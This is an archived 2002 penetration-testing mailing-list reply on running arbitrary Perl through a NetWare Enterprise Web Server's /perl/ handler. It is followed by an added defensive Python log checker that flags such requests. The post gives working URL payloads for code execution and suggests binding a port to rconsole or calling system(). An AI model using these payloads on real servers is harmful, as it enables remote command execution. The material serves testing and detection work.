Penetration Testing mailing list archives

Re: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 -- Assistance requested.


From: Jon DeShirley <jond () csds uidaho edu>
Date: Wed, 18 Dec 2002 16:01:10 -0800

Hey - let me re-open a thread again, if you folks don't mind.  I've found a
server at one of our pen-test clients with this NetWare HTTP/HTTPS server.

Attempt:  http://address/perl/-v
Result:         NetWare port Copyright 1998 Novell Corporation.
                All rights reserved.

What does perl -V tell you, if anything at all? If you're lucky, this will tell you if you've got libraries available to you with which you can have some fun with minimal code. Otherwise, you'll have to code a lot of the module functions into your URL.

Attempt: http://address/perl/-e%20print%20%22hello%20world%22;
Result: IE just hangs there "DONE"

Attempt: http://address/perl/-e%20print%201;
Result: IE just hangs there "DONE"

These will hang because your browser doesn't know what kind of content to display. Something like this should provide some output:

http://address/perl/-e%22%20print%20%22Content-type:%20text%2fplain\n\nhello\n%22%22

FYI, there's a Content-type database here: http://reliableanswers.com/ContentType/

As for what to do, you could probably wire up a quick perl program to bind an unprivileged port to a rconsole or just use it to system() some commands.

--jon


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
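
A defender's view of the requests in this thread, as an added example that is not part of the original post: a log check that flags any request whose first path segment under /perl/ is an interpreter switch (-v, -V, -e) instead of a script name. The Common Log Format input, the sample lines, the function names and the case-insensitive /perl/ match are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a Common Log Format line (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A segment right after /perl/ that starts with "-" is an interpreter switch,
# not a script name. The path prefix is matched case-insensitively (assumption).
SWITCH_RE = re.compile(r'^(?i:/perl/)(?P<switch>-[A-Za-z])(?P<rest>.*)', re.DOTALL)
MEANING = {"-e": "inline code execution",
           "-v": "version banner",
           "-V": "build configuration dump"}

def decode_target(target, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded requests still match."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def flag_perl_switch_requests(lines):
    """Return one finding per log line that passes a switch to the /perl/ handler."""
    findings = []
    for number, line in enumerate(lines, 1):
        request = REQUEST_RE.search(line)
        if not request:
            continue
        hit = SWITCH_RE.match(decode_target(request.group("target")))
        if hit:
            switch = hit.group("switch")
            findings.append({"line": number, "client": line.split()[0],
                             "switch": switch,
                             "meaning": MEANING.get(switch, "other interpreter switch"),
                             "argument": hit.group("rest").strip()})
    return findings

# Constructed sample log lines; the /perl/ requests mirror the ones quoted in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Dec/2002:15:40:01 -0800] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [18/Dec/2002:15:41:12 -0800] "GET /perl/-v HTTP/1.0" 200 88',
    '192.0.2.10 - - [18/Dec/2002:15:42:30 -0800] "GET /perl/-e%20print%201; HTTP/1.0" 200 0',
    '198.51.100.7 - - [18/Dec/2002:15:50:02 -0800] "GET /perl/env.pl HTTP/1.0" 200 512',
    '192.0.2.10 - - [18/Dec/2002:15:55:44 -0800] "GET /PERL/-e%2520print%25201; HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for finding in flag_perl_switch_requests(SAMPLE_LOG):
        print(finding)
```

A 200 response with an empty body on a flagged -e request matches the "hangs" behaviour described above: the code ran but returned no Content-type header, so it still counts as execution.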

